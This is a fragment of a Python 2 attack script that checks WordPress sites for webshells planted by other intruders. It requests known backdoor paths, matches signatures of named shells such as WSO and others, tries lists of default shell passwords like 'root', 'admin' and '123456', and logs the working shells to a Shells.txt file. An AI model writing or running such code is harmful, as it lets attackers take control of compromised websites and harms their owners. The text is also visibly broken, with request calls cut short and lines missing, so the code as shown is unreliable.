if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH21_J_content = requests.get(SH21_J,timeout=15).content
if ' type="file"' in SH21_J_content or ' type=\'file\'' in SH21_J_content or ' type= "file"' in SH21_J_content or ' type= \'file\'' in SH21_J_content or ' type = "file"' in SH21_J_content or ' type = \'file\'' in SH21_J_content or ' type ="file"' in SH21_J_content or ' type =\'file\'' in SH21_J_content or ' type=file' in SH21_J_content or ' type =file' in SH21_J_content or ' type= file' in SH21_J_content or ' type = file' in SH21_J_content or 'Upload</a> ]</li><li>[' in SH21_J_content or 'upload</a><li><a>Sym' in SH21_J_content :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH21_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def WordPress2(site):
site = URL(site)
now =
year = str(now.year)
month = str(now.month)
if '10' in month or '11' in month or '12' in month :
month = month
else :
month = '0'+month
pattern_php = re.compile('<a href="(.*).php">')
pattern_phtml = re.compile('<a href="(.*).phtml">')
SH14 = site+'/shell.php'
SH16 = site+'/wp-admin/network/wp-footer.php'
SH17 = site+'/wp-info.php'
SH18 = site+'/wp-content/vuln.php'
SH20 = site+'/up.php'
SH21 = site+'/upload.php'
SH22 = site+'/upel.php'
SH23 = site+'/wp-content/uploads/'
SH24 = site+'/wp-content/uploads/'+year+'/'+month+'/'
SH25 = site+'/license.php'
SH26 = site+'/wp-content/plugins/ppus/up.php'
SH27 = site+'/098.php'
SH28 = site+'/V5.php'
SH29 = site+'/new_license.php'
SH30 = site+'/wp-content/plugins/theme-configurator/mini.php'
SH31 = site+'/wp-content/plugins/widget-logic/mini.php'
try :
site_check = requests.get(site+'/',timeout=15).content
up_check = requests.get(SH20,timeout=15).content
upload_check = requests.get(SH21,timeout=15).content
SH23_check = requests.get(SH23,timeout=15).content
SH24_check = requests.get(SH24,timeout=15).content
shell_check = requests.get(SH14,timeout=15).content
except :
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
if 'Windows' in shell_check and 'Upload file:' in shell_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'iCloud1337 private shell' in requests.get(SH16,timeout=15).content :
print ' -| '+site +'/ --> {}[iCloud1337]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Copyright 2017 | ErrOr SquaD All Rights Reserved.' in requests.get(SH17,timeout=15).content :
print ' -| '+site +'/ --> {}[ErrOrSquaD]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Vuln!! patch it Now!' in requests.get(SH18,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Vuln!! patch it Now!' in requests.get(SH22,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '' in requests.get(SH26,timeout=15).content :
print ' -| '+site +'/ --> {}[PPUS]'.format(fg)
if 'SuramSh3ll' in requests.get(site+'/wp-content/plugins/ppus/suram.php',timeout=15).content :
with open('Shells.txt', mode='a') as d:
d.write(SH26+' | '+site+'/wp-content/plugins/ppus/suram.php
else :
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in requests.get(SH27,timeout=15).content :
print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Dr HeX' in requests.get(SH28,timeout=15).content :
print ' -| '+site +'/ --> {}[DrHeX]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>File</title>' in requests.get(SH29,timeout=15).content :
print ' -| '+site +'/ --> {}[License]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'U7TiM4T3_H4x0R Plugin' in requests.get(SH30,timeout=15).content :
print ' -| '+site +'/ --> {}[U7TiM4T3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'U7TiM4T3_H4x0R Plugin' in requests.get(SH31,timeout=15).content :
print ' -| '+site +'/ --> {}[U7TiM4T3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Index of' in SH23_check and '.php' in SH23_check :
shells = []
if re.findall(pattern_php,SH23_check):
shells = re.findall(pattern_php,SH23_check)
for shell in shells:
sh_check = requests.get(SH23+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'Index of' in SH23_check and '.phtml' in SH23_check :
shells = []
if re.findall(pattern_phtml,SH23_check):
shells = re.findall(pattern_phtml,SH23_check)
for shell in shells:
sh_check = requests.get(SH23+shell+'.phtml',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.phtml',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.phtml',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.phtml',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.phtml',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.phtml',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.phtml',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.phtml',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.phtml',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.phtml',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.phtml',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.phtml',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.phtml',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.phtml',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
